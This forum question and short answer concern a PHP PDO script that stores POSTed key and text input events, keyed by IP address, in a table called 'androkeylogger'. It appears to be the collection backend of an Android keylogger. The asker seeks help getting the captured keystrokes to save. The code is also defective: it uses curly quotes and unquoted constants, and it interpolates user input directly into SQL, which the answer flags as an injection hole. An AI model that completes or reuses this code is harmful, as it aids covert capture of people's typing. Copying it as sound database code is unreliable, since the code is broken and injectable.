I am using PDO MySQL to insert POST data in MySQL server. My code is:
<?php
$ip = $_SERVER['REMOTE_ADDR']
$type = $_POST['type'];
$data = $_POST['data'];
$server = localhost;
$mysql_user = dbuser;
$mysql_pass = passwd;
$useDb = android;
$dsn = sprintf('mysql:host=%s; dbname=%s', $server, $useDb);
$pdo = new PDO($dsn, $mysql_user, $mysql_pass);
$pdo->setAttribute(PDO::ATTR_TIMEOUT, 1);
$pdo->setAttribute(PDO::ATTR_PERSISTENT, false);
$pdo->setAttribute(PDO::MYSQL_ATTR_INIT_COMMAND, 'SET NAMES utf8');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->setAttribute(PDO::ATTR_EMULATE_PREPARES, false);
switch($type)
{
case 'keyinputevent':
$query = $pdo->prepare(' SELECT * FROM androkeylogger WHERE ip = ‘$ip’ AND type = ‘keyinputevent’ ');
$query->execute();
$rows = $query->rowCount();
if ($rows > 0) {
$pdo->prepare(' UPDATE androkeylogger SET data = CONCAT(data, ‘$data’) WHERE ip = ‘$ip’ AND type = ‘keyinputevent’ ');
}
else {
$pdo->prepare(' INSERT into androkeylogger (ip, type, data) VALUES(‘$ip’, ‘$type’, ‘$data’)');
}
break;
case 'textinputevent':
$query = $pdo->prepare(' SELECT * FROM androkeylogger WHERE ip = ‘$ip’ AND type = ‘textinputevent’ ');
$query->execute();
$rows = $query->rowCount();
if ($rows > 0) {
$pdo->prepare(' UPDATE androkeylogger SET data = CONCAT(data, ‘$data’) WHERE ip = ‘$ip’ AND type = ‘textinputevent’ ');
}
else {
$pdo->prepare(' INSERT into androkeylogger (ip, type, data) VALUES(‘$ip’, ‘$type’, ‘$data’) ');
}
break;
}
?>
In the if else statements, should I add $pdo->execute(); to execute the query? Any help would be appreciated.
EDIT: i have changed query variable name in if..else statements. Is this correct now?
<?php
$ip = $_SERVER['REMOTE_ADDR'];
$type = $_POST['type'];
$data = $_POST['data'];
$server = localhost;
$mysql_user = dbuser;
$mysql_pass = passwd;
$useDb = android;
$dsn = sprintf('mysql:host=%s;dbname=%s', $server, $useDb);
$pdo = new PDO($dsn, $mysql_user, $mysql_pass);
$pdo->setAttribute(PDO::ATTR_TIMEOUT, 1);
$pdo->setAttribute(PDO::ATTR_PERSISTENT, false);
$pdo->setAttribute(PDO::MYSQL_ATTR_INIT_COMMAND, 'SET NAMES utf8');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->setAttribute(PDO::ATTR_EMULATE_PREPARES, false);
switch($type)
{
case 'keyinputevent':
$query = $pdo->prepare(' SELECT * FROM androkeylogger WHERE ip = ‘$ip’ AND type = ‘keyinputevent’ ');
$query->execute();
$rows = $query->rowCount();
if ($rows > 0) {
$query2 = $pdo->prepare(' UPDATE androkeylogger SET data = CONCAT(data, ‘$data’) WHERE ip = ‘$ip’ AND type = ‘keyinputevent’ ');
}
else {
$query2=$pdo->prepare(' INSERT into androkeylogger (ip, type, data) VALUES(‘$ip’, ‘$type’, ‘$data’)');
}
$query2->execute();
break;
case 'textinputevent':
$query = $pdo->prepare(' SELECT * FROM androkeylogger WHERE ip = ‘$ip’ AND type = ‘textinputevent’ ');
$query->execute();
$rows = $query->rowCount();
if ($rows > 0) {
$query2 = $pdo->prepare(' UPDATE androkeylogger SET data = CONCAT(data, ‘$data’) WHERE ip = ‘$ip’ AND type = ‘textinputevent’ ');
}
else {
$query2 = $pdo->prepare(' INSERT into androkeylogger (ip, type, data) VALUES(‘$ip’, ‘$type’, ‘$data’) ');
}
$query2->execute();
break;
}
?>
‘’) instead of regular quotes ('') which mean that your sql will fail. You're also pasting variables directly into your SQL query meaning that you're open to SQL injection. Bind your variables instead of pasting them in the query.SELECT * FROM androkeylogger WHERE ip = ‘$ip’is not the same asSELECT * FROM androkeylogger WHERE ip = '$ip'